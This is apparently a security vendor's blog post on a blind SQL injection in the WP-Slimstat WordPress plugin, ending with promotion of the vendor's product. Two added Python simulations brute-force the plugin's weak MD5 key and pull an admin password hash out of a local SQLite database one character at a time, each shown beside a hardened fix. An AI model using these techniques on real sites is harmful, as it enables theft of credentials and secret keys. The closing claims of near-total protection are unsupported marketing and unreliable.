Up to 1.3M WordPress Sites at risk due to Slimstat plugin vulnerability


Dan Ennis, CEO


A newly disclosed bug in WP-Slimstat, a WordPress analytics plugin, puts the up to 1.3M websites using it at critical risk: an attacker can exploit it to read user names, password hashes and the WordPress secret keys out of the database through a blind SQL injection, a guess-and-confirm process that extracts sensitive data one true/false answer at a time.

Where is the bug present?

The vulnerability, disclosed by Sucuri on Tuesday, is present in WP-Slimstat 3.9.5 and earlier (the fixed release, 3.9.6, was issued on Feb 19).

We should also note that Slimstat has had at least two other known vulnerabilities over the last few months: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=slimstat

How many sites are at risk?

According to the plugin's page on WordPress.org, it has been downloaded over 1.3M times, which is the upper bound on the number of sites that have it installed.

How is the vulnerability exploited?

Slimstat's secret key, which signs the data exchanged between the tracking script and the server, is an MD5 hash of the plugin's installation timestamp, and MD5 is an outdated hash that is very cheap to compute. In versions 3.9.5 and earlier this makes the key guessable: an attacker can learn the year a site went live from online archives, which narrows the installation timestamp to roughly 30M candidates (one per second of that year). Testing all of them takes only minutes on an ordinary CPU. With the recovered key the attacker can sign a crafted request of their own; the plugin feeds values from that request into a database query, giving the attacker a blind SQL injection through which sensitive rows such as user names, password hashes and the WordPress secret keys can be read out.
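The following is an added example, not code from the page, from Sucuri's advisory or from the Slimstat plugin. It models the weak key derivation described above (MD5 of the installation timestamp) and the attacker's brute force over every second of a known year, then contrasts it with a key drawn from the OS random source and used with HMAC. The signature construction `weak_sign` (MD5 over secret and data) and the sample payload are assumptions made for the simulation, not the plugin's real format; what matters is that any scheme keyed only by a guessable secret falls to the same search.

```python
import hashlib
import hmac
import secrets
from datetime import datetime, timezone


def year_bounds(year):
    """Unix timestamps [start, end) covering every second of `year` (UTC)."""
    start = int(datetime(year, 1, 1, tzinfo=timezone.utc).timestamp())
    end = int(datetime(year + 1, 1, 1, tzinfo=timezone.utc).timestamp())
    return start, end


def weak_secret(install_ts):
    """The flawed scheme: the 'secret' is MD5 of the install timestamp (Unix seconds).
    Its entropy is only as large as the attacker's uncertainty about that timestamp."""
    return hashlib.md5(str(install_ts).encode()).hexdigest()


def weak_sign(secret, data):
    """Assumed signature construction for this model: MD5 over secret + data.
    The plugin's exact concatenation is not modelled; any construction keyed only
    by weak_secret() is equally brute-forceable."""
    return hashlib.md5((secret + data).encode()).hexdigest()


def recover_secret(year, data, signature, max_tries=None):
    """Attacker side: given the install year (e.g. from a web archive) and one
    (data, signature) pair observed from the site, try every second of that year
    as the install timestamp until a derived key reproduces the signature.
    Returns (secret, tries) on success or (None, tries) if the search is cut off."""
    start, end = year_bounds(year)
    tries = 0
    for ts in range(start, end):
        tries += 1
        candidate = weak_secret(ts)
        if weak_sign(candidate, data) == signature:
            return candidate, tries
        if max_tries is not None and tries >= max_tries:
            break
    return None, tries


# What the key should look like instead: 256 bits from the OS CSPRNG, never derived
# from anything an attacker can narrow down, and used with a real MAC.
def strong_secret():
    return secrets.token_bytes(32)


def strong_sign(secret, data):
    return hmac.new(secret, data.encode(), hashlib.sha256).hexdigest()


def strong_verify(secret, data, signature):
    return hmac.compare_digest(strong_sign(secret, data), signature)


# Constructed sample payload; the field names are illustrative, not the plugin's.
SAMPLE_DATA = "resource=/index.php&ip=203.0.113.5"


def demo(year=2014, offset=123_456):
    """Simulate a site installed `offset` seconds into `year`, then attack it."""
    start, end = year_bounds(year)
    install_ts = start + offset
    observed_sig = weak_sign(weak_secret(install_ts), SAMPLE_DATA)
    recovered, tries = recover_secret(year, SAMPLE_DATA, observed_sig)
    return {
        "keyspace": end - start,   # ~31.5M candidates for a non-leap year
        "recovered": recovered == weak_secret(install_ts),
        "tries": tries,            # offset + 1: the search stops at the first hit
    }


if __name__ == "__main__":
    print(demo())
```

The demo places the install a day and a half into 2014 so it finishes in well under a second; a worst-case search over the whole year is about 31.5M MD5 evaluations, which is the "several minutes" figure above. The point of `strong_secret` is not the algorithm but the source: 32 random bytes have no year, month or second for an archive lookup to reveal.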

How should organizations defend?

The quickest resolution of the Slimstat vulnerability is to update to Slimstat 3.9.6, issued on Feb 19th.

As of Feb 26, 9AM ET, the Slimstat update statistics page showed minimal update activity, which suggests that many sites are still running vulnerable versions.

Why are Blind SQL injections so hard to identify?

The Slimstat vulnerability is exploited as a blind SQL injection: the injected query never returns data directly, so the attacker asks the application a series of yes/no questions (for example, "is the first character of the admin's password hash greater than 'M'?") and reads the answer from whether the response differs, repeating until the value is reconstructed. Conventional web application security solutions find blind injections harder to identify than classic ones: each request differs only slightly from the last, and the response carries no database error message or leaked data, only a true/false difference, so there is no single obviously malicious request or response to match.
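To make the true/false mechanism concrete, here is an added example (not code from the page, from Sucuri or from the Slimstat plugin) that runs a boolean-based blind extraction against an in-memory SQLite database. The endpoint `handler_vulnerable`, the table layout and the admin row are constructed for the simulation and are not the plugin's real query or schema; the hardened variant shows that binding the value as a parameter turns the same payloads into harmless non-matching literals.

```python
import sqlite3

# Constructed sample data: one fake admin row and one analytics row. No real site is involved.
SAMPLE_HASH = "$P$BexampleHash1234567890"


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SAMPLE_HASH,))
    conn.execute("CREATE TABLE wp_slim_stats (id INTEGER PRIMARY KEY, ip TEXT)")
    conn.execute("INSERT INTO wp_slim_stats VALUES (1, '203.0.113.5')")
    return conn


def handler_vulnerable(conn, stat_id):
    """Hypothetical vulnerable endpoint: the request value is concatenated into SQL.
    The response is only True/False (row found or not), never the data itself."""
    sql = f"SELECT id FROM wp_slim_stats WHERE id = {stat_id}"
    return conn.execute(sql).fetchone() is not None


def handler_hardened(conn, stat_id):
    """Same endpoint with the value bound as a parameter: it can no longer change the
    query structure, so an injected condition is just a literal that matches nothing."""
    row = conn.execute("SELECT id FROM wp_slim_stats WHERE id = ?", (stat_id,)).fetchone()
    return row is not None


def blind_extract(conn, handler, target_expr, length):
    """Boolean-based blind extraction: recover `length` characters of the SQL
    expression `target_expr` by binary search on each character's code point,
    asking only yes/no questions of `handler`. Returns (recovered, request_count)."""
    recovered = ""
    requests = 0
    for pos in range(1, length + 1):
        lo, hi = 32, 126                        # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"1 AND unicode(substr(({target_expr}), {pos}, 1)) > {mid}"
            requests += 1
            if handler(conn, payload):          # True means the code point is > mid
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, requests


ADMIN_HASH_EXPR = "SELECT user_pass FROM wp_users WHERE ID = 1"


def demo(chars=8):
    """Extract the first `chars` characters of the admin hash through each handler."""
    conn = build_db()
    vuln, n_vuln = blind_extract(conn, handler_vulnerable, ADMIN_HASH_EXPR, chars)
    safe, _ = blind_extract(conn, handler_hardened, ADMIN_HASH_EXPR, chars)
    return {"vulnerable": vuln, "hardened": safe, "requests": n_vuln}


if __name__ == "__main__":
    print(demo())
```

Each character costs six or seven requests that individually look like a perfectly ordinary lookup for record 1, which is why a detector keyed on error strings or on data in the response body sees nothing; the signal is the volume and the slowly varying structure of the requests. Against the hardened handler every question is answered "no", so the search converges on a space for every position and learns nothing.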

Are Sentrix Cloud-DMZ customers at risk?

Sentrix Cloud-DMZ customers using the Slimstat plugin are not at risk and will not be affected by the vulnerability, regardless of the Slimstat version they are using.

Cloud-DMZ eliminates blind SQL injection attempts, along with the full range of WordPress vulnerability exploits, by removing the web system's attack surface and serving over 99% of user requests from a hardened cloud-replication grid. As a result, over 99% of the site becomes invisible to attackers.

Additional areas of the website are defended by a variety of security measures, including persistent whitelists that effectively identify blind-SQL attack patterns.